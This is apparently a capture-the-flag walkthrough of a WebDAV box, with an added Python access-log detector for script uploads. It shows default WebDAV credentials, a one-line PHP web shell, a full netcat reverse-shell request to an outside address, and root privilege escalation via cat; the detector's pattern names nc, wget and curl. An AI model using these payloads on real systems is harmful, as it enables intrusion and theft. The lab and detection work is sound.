boot2root machine for FIT and bsides guatemala CTF
This is Dav from THM. This one is ranked as easy and doesn’t give much in the way of hints as to what it’s about.
Ports
HTTP only; makes it simple.
HTTP
Running a basic gobuster turns up a single page: /webdav. This has basic authentication turned on; let’s try some default credentials: wampp:xampp - success! We find some more credentials:
wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91
But I can’t crack the hash, and at this stage I don’t have anywhere to use it anyway. What else can we do? I’ve never done webdav before.
This blog gives some instructions; essentially we can use a command line tool called cadaver to connect and it provides a connection somewhat like FTP or SMB.
Shell
Using this interface I upload some PHP code to a file called cmd.php:
<?php system($_GET['cmd']);?>
From there, I can issue a shell command with Burp Repeater:
GET /webdav/cmd.php?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.9.10.123+1234+>/tmp/f HTTP/1.1
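From the defender's side, the upload and the follow-up request above leave a recognisable pair of entries in the web server's access log. The following is an added example, not part of the original write-up, that flags that pair; the log lines are constructed, and the function name, regexes and alert labels are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format: host ident user [time] "METHOD target PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar)$', re.I)
# Shell metacharacters or tool names that rarely belong in a query-string value
SHELL_HINT = re.compile(r'[;|`]|\$\(|\b(mkfifo|nc|bash|sh|wget|curl)\b')

SAMPLE = [  # constructed log lines, not taken from the write-up
    '203.0.113.7 - wampp [10/Oct/2023:13:55:01 +0000] "PROPFIND /webdav/ HTTP/1.1" 207 1024 "-" "-"',
    '203.0.113.7 - wampp [10/Oct/2023:13:55:09 +0000] "PUT /webdav/cmd.php HTTP/1.1" 201 261 "-" "-"',
    '203.0.113.7 - wampp [10/Oct/2023:13:55:30 +0000] "GET /webdav/cmd.php?cmd=id%3buname+-a HTTP/1.1" 200 54 "-" "-"',
    '198.51.100.4 - alice [10/Oct/2023:14:02:11 +0000] "PUT /webdav/notes.txt HTTP/1.1" 201 180 "-" "-"',
    '198.51.100.4 - - [10/Oct/2023:14:03:00 +0000] "GET /index.php?q=shell+scripting HTTP/1.1" 200 900 "-" "-"',
]

def detect(lines):
    """Return alerts for script uploads via PUT and command-like requests to scripts."""
    uploaded, alerts = set(), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        host, user, method, target, status = m.groups()
        url = urlsplit(target)
        is_script = bool(SCRIPT_EXT.search(url.path))
        ok = status.startswith("2")  # only successful requests matter here
        if method == "PUT" and ok and is_script:
            uploaded.add(url.path)
            alerts.append(("script-upload", host, user, url.path))
        elif method in ("GET", "POST") and ok and is_script:
            values = [v for _, v in parse_qsl(url.query, keep_blank_values=True)]
            if any(SHELL_HINT.search(v) for v in values):
                kind = "cmd-on-uploaded-script" if url.path in uploaded else "cmd-in-query"
                alerts.append((kind, host, user, url.path))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

A WebDAV MOVE that renames an uploaded file to a script extension carries the new name in the Destination header, which the default combined log format does not record, so this check sees only direct PUTs.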
Privesc
I run linpeas; we can run cat as root. From there we get the root flag and can also read the shadow file if we want: